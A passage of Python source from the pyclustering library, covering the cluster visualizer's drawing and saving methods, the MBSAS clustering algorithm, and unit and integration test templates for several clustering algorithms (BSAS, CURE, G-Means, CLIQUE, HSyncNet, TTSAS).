added_attribute_cluster_descriptor = canvas_cluster_descr(data, None, attribute_marker, attribure_markersize, attribute_color)
self.__canvas_clusters[index_canvas][index_cluster].attributes.append(added_attribute_cluster_descriptor)
def append_clusters(self, clusters, data=None, canvas=0, marker='.', markersize=None):
"""!
@brief Appends list of cluster to canvas for drawing.
@param[in] clusters (array_like): List of clusters where each cluster may consist of indexes of objects from the data or object itself.
@param[in] data (array_like): If defines that each element of cluster is considered as a index of object from the data.
@param[in] canvas (uint): Number of canvas that should be used for displaying clusters.
@param[in] marker (string): Marker that is used for displaying objects from clusters on the canvas.
@param[in] markersize (uint): Size of marker.
"""
for cluster in clusters:
self.append_cluster(cluster, data, canvas, marker, markersize)
def set_canvas_title(self, text, canvas=0):
"""!
@brief Set title for specified canvas.
@param[in] text (string): Title for the canvas.
@param[in] canvas (uint): Index of the canvas where title should be displayed.
"""
if canvas > self.__number_canvases:
raise ValueError("Canvas with index '%d' does not exists (total amount of canvases: '%d')." %
canvas, self.__number_canvases)
self.__canvas_titles[canvas] = text
def get_cluster_color(self, index_cluster, index_canvas):
"""!
@brief Returns cluster color on specified canvas.
"""
return self.__canvas_clusters[index_canvas][index_cluster].color
def save(self, filename, **kwargs):
"""!
@brief Saves figure to the specified file.
@param[in] filename (string): File where the visualized clusters should be stored.
@param[in] **kwargs: Arbitrary keyword arguments (available arguments: 'invisible_axis', 'visible_grid').
<b>Keyword Args:</b><br>
- invisible_axis (bool): Defines visibility of axes on each canvas, if `True` - axes are invisible.
By default axis are invisible.
- visible_grid (bool): Defines visibility of grid on each canvas, if `True` - grid is displayed.
By default grid of each canvas is displayed.
There is an example how to save visualized clusters to the PNG file without showing them on a screen:
@code
from pyclustering.cluster import cluster_visualizer
data = [[1.1], [1.7], [3.7], [5.3], [2.5], [-1.5], [-0.9], [6.3], [6.5], [8.1]]
clusters = [[0, 1, 2, 4, 5, 6], [3, 7, 8, 9]]
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, data)
visualizer.save("1-dimensional-clustering.png")
@endcode
"""
if len(filename) == 0:
raise ValueError("Impossible to save visualization to file: empty file path is specified.")
invisible_axis = kwargs.get('invisible_axis', True)
visible_grid = kwargs.get('visible_grid', True)
self.show(None, invisible_axis, visible_grid, False)
plt.savefig(filename)
@staticmethod
def close(figure):
"""!
@brief Closes figure object that was used or allocated by the visualizer.
@param[in] figure (figure): Figure object that was used or allocated by the visualizer.
"""
plt.close(figure)
def show(self, figure=None, invisible_axis=True, visible_grid=True, display=True, shift=None):
"""!
@brief Shows clusters (visualize) on created or existed figure.
@details The class is not responsible figures that used for visualization, they should be closed using
`close()` method of this visualizer.
@param[in] figure (fig): Defines requirement to use specified figure, if None - new figure is created for drawing clusters.
@param[in] invisible_axis (bool): Defines visibility of axes on each canvas, if True - axes are invisible.
@param[in] visible_grid (bool): Defines visibility of grid on each canvas, if True - grid is displayed.
@param[in] display (bool): Defines requirement to display clusters on a stage, if True - clusters are displayed,
if False - plt.show() should be called by user."
@param[in] shift (uint): Force canvas shift value - defines canvas index from which custers should be visualized.
@return (fig) Figure where clusters are shown.
"""
canvas_shift = shift
if canvas_shift is None:
if figure is not None:
canvas_shift = len(figure.get_axes())
else:
canvas_shift = 0
if figure is not None:
cluster_figure = figure
else:
cluster_figure = plt.figure()
maximum_cols = self.__size_row
maximum_rows = math.ceil((self.__number_canvases + canvas_shift) / maximum_cols)
grid_spec = gridspec.GridSpec(maximum_rows, maximum_cols)
for index_canvas in range(len(self.__canvas_clusters)):
canvas_data = self.__canvas_clusters[index_canvas]
if len(canvas_data) == 0:
continue
dimension = self.__canvas_dimensions[index_canvas]
#ax = axes[real_index];
if (dimension == 1) or (dimension == 2):
ax = cluster_figure.add_subplot(grid_spec[index_canvas + canvas_shift])
else:
ax = cluster_figure.add_subplot(grid_spec[index_canvas + canvas_shift], projection='3d')
if len(canvas_data) == 0:
plt.setp(ax, visible=False)
for cluster_descr in canvas_data:
self.__draw_canvas_cluster(ax, dimension, cluster_descr)
for attribute_descr in cluster_descr.attributes:
self.__draw_canvas_cluster(ax, dimension, attribute_descr)
if invisible_axis is True:
ax.xaxis.set_ticklabels([])
ax.yaxis.set_ticklabels([])
if dimension == 3:
ax.zaxis.set_ticklabels([])
if self.__canvas_titles[index_canvas] is not None:
ax.set_title(self.__canvas_titles[index_canvas])
ax.grid(visible_grid)
if display is True:
plt.show()
return cluster_figure
def __draw_canvas_cluster(self, ax, dimension, cluster_descr):
"""!
@brief Draw canvas cluster descriptor.
@param[in] ax (Axis): Axis of the canvas where canvas cluster descriptor should be displayed.
@param[in] dimension (uint): Canvas dimension.
@param[in] cluster_descr (canvas_cluster_descr): Canvas cluster descriptor that should be displayed.
@return (fig) Figure where clusters are shown.
"""
cluster = cluster_descr.cluster
data = cluster_descr.data
marker = cluster_descr.marker
markersize = cluster_descr.markersize
color = cluster_descr.color
for item in cluster:
if dimension == 1:
if data is None:
ax.plot(item[0], 0.0, color=color, marker=marker, markersize=markersize)
else:
ax.plot(data[item][0], 0.0, color=color, marker=marker, markersize=markersize)
elif dimension == 2:
if data is None:
ax.plot(item[0], item[1], color=color, marker=marker, markersize=markersize)
else:
ax.plot(data[item][0], data[item][1], color=color, marker=marker, markersize=markersize)
elif dimension == 3:
if data is None:
ax.scatter(item[0], item[1], item[2], c=color, marker=marker, s=markersize)
else:
ax.scatter(data[item][0], data[item][1], data[item][2], c=color, marker=marker, s=markersize)
```
#### File: pyclustering/cluster/mbsas.py
```python
from pyclustering.core.mbsas_wrapper import mbsas as mbsas_wrapper
from pyclustering.core.metric_wrapper import metric_wrapper
from pyclustering.cluster.bsas import bsas
class mbsas(bsas):
"""!
@brief Class represents MBSAS (Modified Basic Sequential Algorithmic Scheme).
@details Interface of MBSAS algorithm is the same as for BSAS. This algorithm performs clustering in two steps.
The first - is determination of amount of clusters. The second - is assignment of points that were not
marked as a cluster representatives to clusters.
Code example of MBSAS usage:
@code
from pyclustering.cluster.bsas import bsas_visualizer
from pyclustering.cluster.mbsas import mbsas
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import SIMPLE_SAMPLES
# Read data sample from 'Simple02.data'.
sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE2)
# Prepare algorithm's parameters.
max_clusters = 3
threshold = 1.0
# Create instance of MBSAS algorithm.
mbsas_instance = mbsas(sample, max_clusters, threshold)
mbsas_instance.process()
# Get clustering results.
clusters = mbsas_instance.get_clusters()
representatives = mbsas_instance.get_representatives()
# Display results.
bsas_visualizer.show_clusters(sample, clusters, representatives)
@endcode
@see pyclustering.cluster.bsas, pyclustering.cluster.ttsas
"""
def __init__(self, data, maximum_clusters, threshold, ccore=True, **kwargs):
"""!
@brief Creates MBSAS algorithm.
@param[in] data (list): Input data that is presented as list of points (objects), each point should be represented by list or tuple.
@param[in] maximum_clusters: Maximum allowable number of clusters that can be allocated during processing.
@param[in] threshold: Threshold of dissimilarity (maximum distance) between points.
@param[in] ccore (bool): If True than DLL CCORE (C++ solution) will be used for solving.
@param[in] **kwargs: Arbitrary keyword arguments (available arguments: 'metric').
<b>Keyword Args:</b><br>
- metric (distance_metric): Metric that is used for distance calculation between two points.
"""
super().__init__(data, maximum_clusters, threshold, ccore, **kwargs)
def process(self):
"""!
@brief Performs cluster analysis in line with MBSAS algorithm.
@return (mbsas) Returns itself (MBSAS instance).
@see get_clusters()
@see get_representatives()
"""
if self._ccore is True:
self.__process_by_ccore()
else:
self.__prcess_by_python()
return self
def __process_by_ccore(self):
ccore_metric = metric_wrapper.create_instance(self._metric)
self._clusters, self._representatives = mbsas_wrapper(self._data, self._amount, self._threshold, ccore_metric.get_pointer())
def __prcess_by_python(self):
self._clusters.append([0])
self._representatives.append(self._data[0])
skipped_objects = []
for i in range(1, len(self._data)):
point = self._data[i]
index_cluster, distance = self._find_nearest_cluster(point)
if (distance > self._threshold) and (len(self._clusters) < self._amount):
self._representatives.append(point)
self._clusters.append([i])
else:
skipped_objects.append(i)
for i in skipped_objects:
point = self._data[i]
index_cluster, _ = self._find_nearest_cluster(point)
self._clusters[index_cluster].append(i)
self._update_representative(index_cluster, point)
```
#### File: cluster/tests/bsas_templates.py
```python
import matplotlib;
matplotlib.use('Agg');
from pyclustering.tests.assertion import assertion;
from pyclustering.cluster.bsas import bsas, bsas_visualizer;
from pyclustering.utils import read_sample;
from pyclustering.utils.metric import type_metric, distance_metric;
class bsas_test_template:
@staticmethod
def clustering(path, amount, threshold, expected, ccore, **kwargs):
metric = kwargs.get('metric', distance_metric(type_metric.EUCLIDEAN));
sample = read_sample(path);
bsas_instance = bsas(sample, amount, threshold, ccore=ccore, metric=metric);
bsas_instance.process();
clusters = bsas_instance.get_clusters();
representatives = bsas_instance.get_representatives();
obtained_length = 0;
obtained_cluster_length = [];
for cluster in clusters:
obtained_length += len(cluster);
obtained_cluster_length.append(len(cluster));
assertion.eq(len(sample), obtained_length);
assertion.eq(len(expected), len(clusters));
assertion.eq(len(expected), len(representatives));
assertion.ge(amount, len(clusters));
dimension = len(sample[0]);
for rep in representatives:
assertion.eq(dimension, len(rep));
expected.sort();
obtained_cluster_length.sort();
assertion.eq(expected, obtained_cluster_length);
@staticmethod
def visualizing(path, amount, threshold, ccore):
sample = read_sample(path);
bsas_instance = bsas(sample, amount, threshold, ccore=ccore);
bsas_instance.process();
bsas_visualizer.show_clusters(sample, bsas_instance.get_clusters(), bsas_instance.get_representatives());
```
#### File: cluster/tests/cure_templates.py
```python
import numpy
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.utils import read_sample
from pyclustering.cluster.cure import cure
from pyclustering.cluster.encoder import type_encoding, cluster_encoder
from pyclustering.tests.assertion import assertion
from random import random
class CureTestTemplates:
@staticmethod
def template_cluster_allocation(input_data, cluster_sizes, number_cluster, number_represent_points = 5, compression = 0.5, ccore_flag = False, **kwargs):
if isinstance(input_data, str):
sample = read_sample(input_data)
else:
sample = input_data
numpy_usage = kwargs.get('numpy_usage', False)
if numpy_usage is True:
sample = numpy.array(sample)
cure_instance = cure(sample, number_cluster, number_represent_points, compression, ccore = ccore_flag)
cure_instance.process()
clusters = cure_instance.get_clusters()
representors = cure_instance.get_representors()
means = cure_instance.get_means()
assertion.eq(len(clusters), number_cluster)
assertion.eq(len(representors), number_cluster)
assertion.eq(len(means), number_cluster)
obtained_cluster_sizes = [len(cluster) for cluster in clusters]
total_length = sum(obtained_cluster_sizes)
assertion.eq(total_length, len(sample))
cluster_sizes.sort()
obtained_cluster_sizes.sort()
assertion.eq(cluster_sizes, obtained_cluster_sizes)
@staticmethod
def templateClusterAllocationOneDimensionData(ccore_flag):
input_data = [ [random()] for _ in range(10) ] + [ [random() + 3] for _ in range(10) ] + [ [random() + 5] for _ in range(10) ] + [ [random() + 8] for _ in range(10) ]
cure_instance = cure(input_data, 4, ccore = ccore_flag)
cure_instance.process()
clusters = cure_instance.get_clusters()
assertion.eq(4, len(clusters))
for cluster in clusters:
assertion.eq(10, len(cluster))
@staticmethod
def templateEncoderProcedures(ccore_flag):
sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE3)
cure_instance = cure(sample, 4, 5, 0.5, ccore = ccore_flag)
cure_instance.process()
clusters = cure_instance.get_clusters()
encoding = cure_instance.get_cluster_encoding()
encoder = cluster_encoder(encoding, clusters, sample)
encoder.set_encoding(type_encoding.CLUSTER_INDEX_LABELING)
encoder.set_encoding(type_encoding.CLUSTER_OBJECT_LIST_SEPARATION)
encoder.set_encoding(type_encoding.CLUSTER_INDEX_LIST_SEPARATION)
assertion.eq(4, len(clusters))
@staticmethod
def exception(type, input_data, number_cluster, number_represent_points, compression, ccore_flag):
try:
if isinstance(input_data, str):
sample = read_sample(input_data)
else:
sample = input_data
cure_instance = cure(sample, number_cluster, number_represent_points, compression, ccore=ccore_flag)
cure_instance.process()
except type:
return
except Exception as ex:
raise AssertionError("Expected: '%s', Actual: '%s'" % (type, type(ex).__name__))
raise AssertionError("Expected: '%s', Actual: 'None'" % type)
```
#### File: cluster/tests/gmeans_templates.py
```python
import unittest
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.samples import answer_reader
from pyclustering.cluster.gmeans import gmeans
from pyclustering.utils import read_sample
class gmeans_test_template(unittest.TestCase):
def clustering(self, sample_path, answer, amount, ccore, **kwargs):
attempts = 10
failures = ""
k_max = kwargs.get('k_max', -1)
random_state = kwargs.get('random_state', None)
data = read_sample(sample_path)
if isinstance(answer, str):
reader = answer_reader(answer)
expected_length_clusters = sorted(reader.get_cluster_lengths())
amount_clusters = len(expected_length_clusters)
elif isinstance(answer, int):
expected_length_clusters = None
amount_clusters = answer
else:
expected_length_clusters = answer
amount_clusters = len(answer)
for _ in range(attempts):
gmeans_instance = gmeans(data, amount, ccore, k_max=k_max, random_state=random_state).process()
clusters = gmeans_instance.get_clusters()
centers = gmeans_instance.get_centers()
wce = gmeans_instance.get_total_wce()
self.assertEqual(amount_clusters, len(centers))
if len(clusters) > 1:
self.assertGreater(wce, 0.0)
else:
self.assertGreaterEqual(wce, 0.0)
if len(clusters) != amount_clusters:
failures += "1. %d != %d\n" % (len(clusters), amount_clusters)
continue
unique_indexes = set()
for cluster in clusters:
for index_point in cluster:
unique_indexes.add(index_point)
if len(data) != len(unique_indexes):
failures += "2. %d != %d\n" % (len(data), len(unique_indexes))
continue
if expected_length_clusters is None:
return
expected_total_length = sum(expected_length_clusters)
actual_total_length = sum([len(cluster) for cluster in clusters])
if expected_total_length != actual_total_length:
failures += "3. %d != %d\n" % (expected_total_length, actual_total_length)
continue
actual_length_clusters = sorted([len(cluster) for cluster in clusters])
if expected_length_clusters != actual_length_clusters:
failures += "4. %s != %s\n" % (str(expected_length_clusters), str(actual_length_clusters))
continue
return
self.fail("Expected result is not obtained during %d attempts: %s\n" % (attempts, failures))
```
#### File: cluster/tests/__init__.py
```python
from pyclustering.tests.suite_holder import suite_holder
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.cluster.tests.integration import clustering_integration_tests
from pyclustering.cluster.tests.unit import clustering_unit_tests
class clustering_tests(suite_holder):
def __init__(self):
super().__init__()
clustering_integration_tests.fill_suite(self.get_suite())
clustering_unit_tests.fill_suite(self.get_suite())
@staticmethod
def fill_suite(cluster_suite):
clustering_integration_tests.fill_suite(cluster_suite)
clustering_unit_tests.fill_suite(cluster_suite)
```
#### File: tests/integration/it_clique.py
```python
import unittest
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.cluster.clique import clique
from pyclustering.cluster.tests.clique_templates import clique_test_template
from pyclustering.samples.definitions import SIMPLE_SAMPLES, FCPS_SAMPLES
from pyclustering.core.tests import remove_library
from pyclustering.tests.assertion import assertion
class clique_integration_test(unittest.TestCase):
def test_clustering_sample_simple_1_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 8, 0, [5, 5], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 7, 0, [5, 5], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 6, 0, [5, 5], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 5, 0, [5, 5], 0, True)
def test_clustering_sample_simple_1_one_cluster_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 0, [10], 0, True)
def test_clustering_diagonal_blocks_arent_neoghbors_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 0, [5, 5], 0, True)
def test_clustering_sample_simple_1_noise_only_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 6, 1000, [], 10, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 6, 10, [], 10, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 5, [], 10, True)
def test_clustering_sample_simple_2_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 7, 0, [5, 8, 10], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 6, 0, [5, 8, 10], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 1, 0, [23], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 6, 500, [], 23, True)
def test_clustering_sample_simple_3_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 9, 0, [10, 10, 10, 30], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 8, 0, [10, 10, 10, 30], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 1, 0, [60], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 6, 500, [], 60, True)
def test_clustering_sample_simple_3_one_point_noise_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 2, 9, [59], 1, True)
def test_clustering_sample_simple_4_one_cluster_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, 1, 0, [75], 0, True)
def test_clustering_sample_simple_5_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 8, 0, [15, 15, 15, 15], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 7, 0, [15, 15, 15, 15], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 6, 0, [15, 15, 15, 15], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 5, 0, [15, 15, 15, 15], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 1, 0, [60], 0, True)
def test_clustering_one_dimensional_data1_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 4, 0, [10, 10], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 2, 0, [20], 0, True)
def test_clustering_one_dimensional_data2_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, 15, 0, [15, 20, 30, 80], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, 2, 0, [145], 0, True)
def test_clustering_one_dimensional_data_3_similar_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 7, 0, [10, 20], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 2, 0, [30], 0, True)
def test_clustering_sample_simple_10_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, 8, 0, [11, 11, 11], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, 7, 0, [11, 11, 11], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, 2, 0, [33], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, 1, 0, [33], 0, True)
def test_clustering_three_dimensional_data1_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 6, 0, [10, 10], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 5, 0, [10, 10], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 1, 0, [20], 0, True)
def test_clustering_similar_points_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 8, 0, [5, 5, 5], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 7, 0, [5, 5, 5], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 5, 0, [5, 5, 5], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 2, 0, [15], 0, True)
def test_clustering_zero_column_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE13, 3, 0, [5, 5], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE13, 2, 0, [5, 5], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE13, 1, 0, [10], 0, True)
def test_clustering_fcps_lsun_by_core(self):
clique_test_template.clustering(FCPS_SAMPLES.SAMPLE_LSUN, 15, 0, [100, 101, 202], 0, True)
def test_clustering_fcps_hepta_by_core(self):
clique_test_template.clustering(FCPS_SAMPLES.SAMPLE_HEPTA, 9, 0, [30, 30, 30, 30, 30, 30, 32], 0, True)
def test_visualize_no_failure_one_dimensional_by_core(self):
clique_test_template.visualize(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 4, 0, True)
clique_test_template.visualize(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, 7, 0, True)
def test_visualize_no_failure_two_dimensional_by_core(self):
clique_test_template.visualize(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 8, 0, True)
clique_test_template.visualize(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 0, True)
def test_visualize_no_failure_three_dimensional_by_core(self):
clique_test_template.visualize(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 3, 0, True)
def test_high_dimension_data_failure(self):
data = [[0, 1, 2, 1, 3, 4, 5, 1, 2, 3, 3, 1, 3], [0, 1, 0, 1, 3, 8, 5, 5, 3, 3, 3, 0, 0]]
clique_instance = clique(data, 15, 0)
assertion.exception(RuntimeError, clique_instance.process)
def test_processing_when_library_core_removed(self):
self.run_removed_library_core_test()
@remove_library
def run_removed_library_core_test(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 8, 0, [5, 5], 0, True)
```
#### File: tests/integration/it_hsyncnet.py
```python
import unittest;
import matplotlib;
matplotlib.use('Agg');
from pyclustering.cluster.tests.hsyncnet_templates import HsyncnetTestTemplates;
from pyclustering.nnet import solve_type;
from pyclustering.samples.definitions import SIMPLE_SAMPLES;
from pyclustering.core.tests import remove_library;
class HsyncnetIntegrationTest(unittest.TestCase):
def testClusteringSampleSimple1WithoutCollectingByCore(self):
HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [5, 5], solve_type.FAST, 5, 0.3, False, True);
def testClusteringSampleSimple1ByCore(self):
HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [5, 5], solve_type.FAST, 5, 0.3, True, True);
def testClusteringOneAllocationSampleSimple1ByCore(self):
HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, [10], solve_type.FAST, 5, 0.3, True, True);
def testClusteringSampleSimple2ByCore(self):
HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, [10, 5, 8], solve_type.FAST, 5, 0.2, True, True);
def testClusteringOneAllocationSampleSimple2ByCore(self):
HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 1, [23], solve_type.FAST, 5, 0.2, True, True);
def testClusteringOneDimensionDataSampleSimple7ByCore(self):
HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 2, [10, 10], solve_type.FAST, 5, 0.3, True, True);
def testClusteringTheSameData1ByCore(self):
HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 3, [5, 5, 5], solve_type.FAST, 5, 0.3, True, True);
def testDynamicLengthCollectingByCore(self):
HsyncnetTestTemplates.templateDynamicLength(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, None, 5, 0.3, True, True);
def testDynamicLengthWithoutCollectingByCore(self):
HsyncnetTestTemplates.templateDynamicLength(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, None, 5, 0.3, False, True);
def testProcessingWhenLibraryCoreRemoved(self):
self.runRemovedLibraryCoreTest()
@remove_library
def runRemovedLibraryCoreTest(self):
HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [5, 5], solve_type.FAST, 5, 0.3, False, True)
```
#### File: tests/integration/it_ttsas.py
```python
import unittest;
import matplotlib;
matplotlib.use('Agg');
from pyclustering.core.tests import remove_library;
from pyclustering.cluster.tests.ttsas_template import ttsas_test;
from pyclustering.utils.metric import type_metric, distance_metric;
from pyclustering.samples.definitions import SIMPLE_SAMPLES;
class ttsas_integration_tests(unittest.TestCase):
def testClusteringSampleSimple1(self):
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1.0, 2.0, [5, 5], True);
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 10.0, 20.0, [10], True);
def testClusteringSampleSimple1Euclidean(self):
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1.0, 2.0, [5, 5], True, metric=distance_metric(type_metric.EUCLIDEAN));
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 10.0, 20.0, [10], True, metric=distance_metric(type_metric.EUCLIDEAN));
def testClusteringSampleSimple1EuclideanSquare(self):
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1.0, 2.0, [5, 5], True, metric=distance_metric(type_metric.EUCLIDEAN_SQUARE));
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 10.0, 20.0, [5, 5], True, metric=distance_metric(type_metric.EUCLIDEAN_SQUARE));
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 100.0, 200.0, [10], True, metric=distance_metric(type_metric.EUCLIDEAN_SQUARE));
def testClusteringSampleSimple1Manhattan(self):
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1.0, 2.0, [5, 5], True, metric=distance_metric(type_metric.MANHATTAN));
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 10.0, 20.0, [10], True, metric=distance_metric(type_metric.MANHATTAN));
def testClusteringSampleSimple1Chebyshev(self):
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1.0, 2.0, [5, 5], True, metric=distance_metric(type_metric.CHEBYSHEV));
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 10.0, 20.0, [10], True, metric=distance_metric(type_metric.CHEBYSHEV));
def testClusteringSampleSimple2(self):
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 1.0, 2.0, [5, 8, 10], True);
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 10.0, 20.0, [23], True);
def testClusteringSampleSimple3(self):
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 1.0, 2.0, [10, 10, 10, 30], True);
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 10.0, 20.0, [60], True);
def testOneDimentionalPoints1(self):
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 1.0, 2.0, [10, 10], True);
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 10.0, 20.0, [20], True);
def testOneDimentionalPoints2(self):
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 1.0, 2.0, [10, 20], True);
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 10.0, 20.0, [30], True);
def testThreeDimentionalPoints(self):
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 1.0, 2.0, [10, 10], True);
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 10.0, 20.0, [20], True);
def testTheSamePoints1(self):
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 1.0, 1.5, [5, 5, 5], True);
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 0.001, 0.002, [5, 5, 5], True);
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 1000, 2000, [15], True);
def testTheSamePoints2(self):
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 1.0, 2.0, [10, 20], True);
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 10.0, 20.0, [30], True);
def testProcessingWhenLibraryCoreRemoved(self):
self.runRemovedLibraryCoreTest()
@remove_library
def runRemovedLibraryCoreTest(self):
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1.0, 2.0, [5, 5], True)
```
#### File: cluster/tests/mbsas_templates.py
```python
import matplotlib;
matplotlib.use('Agg');
from pyclustering.tests.assertion import assertion;
from pyclustering.cluster.mbsas import mbsas;
from pyclustering.utils import read_sample;
from pyclustering.utils.metric import type_metric, distance_metric;
class mbsas_test_template:
@staticmethod
def clustering(path, amount, threshold, expected, ccore, **kwargs):
metric = kwargs.get('metric', distance_metric(type_metric.EUCLIDEAN));
sample = read_sample(path);
mbsas_instance = mbsas(sample, amount, threshold, ccore=ccore, metric=metric);
mbsas_instance.process();
clusters = mbsas_instance.get_clusters();
representatives = mbsas_instance.get_representatives();
obtained_length = 0;
obtained_cluster_length = [];
for cluster in clusters:
